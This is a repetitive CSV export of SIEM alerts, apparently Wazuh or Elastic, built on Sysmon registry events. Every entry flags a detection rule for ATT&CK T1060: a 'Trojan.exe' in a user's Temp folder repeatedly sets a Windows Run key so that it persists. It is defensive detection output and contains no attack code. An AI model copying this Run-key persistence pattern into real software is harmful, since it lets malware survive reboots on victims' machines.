HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:37.793"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:51.357",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:36.779 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:36.787298100Z"",""eventRecordID"":""1243"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:36.779\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:36.779"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:48.905",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:35.751 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:35.775153000Z"",""eventRecordID"":""1242"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:35.751\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:35.751"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:47.864",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:34.686 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:34.697717200Z"",""eventRecordID"":""1240"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:34.686\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:34.686"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:45.856",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:33.584 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:33.588822800Z"",""eventRecordID"":""1239"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:33.584\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:33.584"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:45.839",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:32.560 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:32.677363500Z"",""eventRecordID"":""1238"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:32.560\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:32.560"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:44.670",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:31.544 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:31.563845600Z"",""eventRecordID"":""1237"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:31.544\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:31.544"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:43.670",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:30.529 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:30.551872300Z"",""eventRecordID"":""1234"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:30.529\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:30.529"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:42.654",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:29.525 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:29.526398600Z"",""eventRecordID"":""1232"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:29.525\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:29.525"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:41.624",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:28.513 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:28.521901200Z"",""eventRecordID"":""1230"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:28.513\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:28.513"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:40.673",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:27.346 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:27.403214200Z"",""eventRecordID"":""1228"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:27.346\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:27.346"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:39.581",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:26.046 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:26.181878900Z"",""eventRecordID"":""1226"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:26.046\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 